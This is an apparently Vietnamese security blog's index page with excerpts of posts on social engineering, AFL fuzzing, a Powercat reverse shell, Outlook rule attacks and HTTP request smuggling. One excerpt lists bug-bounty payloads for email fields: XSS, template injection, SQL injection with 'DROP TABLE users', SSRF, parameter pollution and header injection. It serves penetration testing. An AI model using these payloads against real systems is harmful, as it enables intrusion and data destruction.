Home

nhattruongblog

Tấn công Social Engineering toàn tập [part 2]

Phân loại Social Engineering Social Engineering có thể được chia thành hai loại phổ biến: Human-Based Social Engineering Human-based là kỹ thuật Social Engineering liên quan đến sự tương tác giữa con người với con người để thu được thông tin mong muốn. Ví dụ như chúng ta phải gọi điện thoại đến phòng Help…

Đọc tiếp

Tấn công Social Engineering toàn tập [part 1]

Giới thiệu Trên thế giới, khi nói về vấn đề bảo mật thông tin, người ta không thể không nói đến Social Engineering – một kỹ thuật khai thác thông tin rất nguy hiểm, khó phát hiện, phòng chống và gây thiệt hại to lớn cho công tác bảo mật thông tin. Ngày nay, công…

Đọc tiếp

FUZZING VỚI AFL

Giới thiệu American Fuzzy Lop, được viết tắt là AFL là một công cụ kiểm thử mờ thông minh. Được dùng để tìm các lỗ hổng phần mềm bằng cách gửi dữ liệu đầu vào có định đạng sai tới ứng dụng. Nếu phần mềm crash hoặc hoạt động không đúng dự kiến, nó có…

Đọc tiếp

[Bug Bounty]Một số payload khi test trường email

Chép lại cho các ông copy nhé, nhất các ông :v XSStest+(alert(0))@example.comtest@example(alert(0)).com”alert(0)”@example.comTemplate injection”<%=7*7%>”@example.comtest+(${{7*7}})@example.comSQLi”‘OR1=1–‘”@example.com”mail’);DROP TABLE users;–“@example.comSSRFjohn.doe@abc123.burpcollaborator.netjohn.doe@[127.0.0.1]Parameter pollutionvictim&email=attacker@example.com(Email) Header injection”%0d%0aContent-Length:%200%0d%0a%0d%0a”@example.com”recicpient@test.com>\r\nRCPT TO:<victim+”@test.com

Đọc tiếp

Reverseshell-Powercat-v2

Con hàng backconnect cơ bản, dùng khá okela, khá mượt. Link download: Muốn biến powershell thành exe thì dùng: Lưu ý: máy chủ C&C phải mở hai port.

Đọc tiếp

Outlook Form/Rule attack cheat sheet

Bài viết ngắn gọn cho tấn công Outlook form/rule attack, cách sử dụng công cụ ruler. Nguyên lý của tấn công này là tất cả các rule, custom form đều sẽ được đồng bộ nên có thể đăng nhập ở bất kỳ máy nào để thiết lập script độc hại. Đọc thêm: Công cụ Link…

Đọc tiếp

HTTP Request Smuggling toàn tập

I. HTTP request smuggling là gì? HTTP Request Smuggling là một kỹ thuật khai thác sự bất đồng bộ xử lý gói tin HTTP giữa máy chủ proxy/balancer/… với máy chủ web/backend. Lỗ hổng này thường gây ra các ảnh hưởng rất nghiệp trọng tới logic web thông thường. OK chúng ta sẽ cùng tìm…

Đọc tiếp

Loading…

Something went wrong. Please refresh the page and/or try again.




android security An toàn thông tin kỷ niệm 70 năm thành lập ngành Ngân hàng Việt Nam app security backconnect buffer overflow CTF CVE CVE-2019-18935 CVE-2021-26084 CVE-2021-44228 Cơ Sở An Toàn Thông Tin deserialization docker dynamic loader frida frida-server frida gadget frida server frida trace gumjs Hide and seek hà nội LD_PRELOAD LearnPress MB MBBANK pentest phishing phố đi bộ pwn python RCE redteam rsa social engineering SQL injection Teachers Record Management System 1.0 telerik UI truongtn VSEC vulnerability WaTF-Bank wordpress write up XXS

About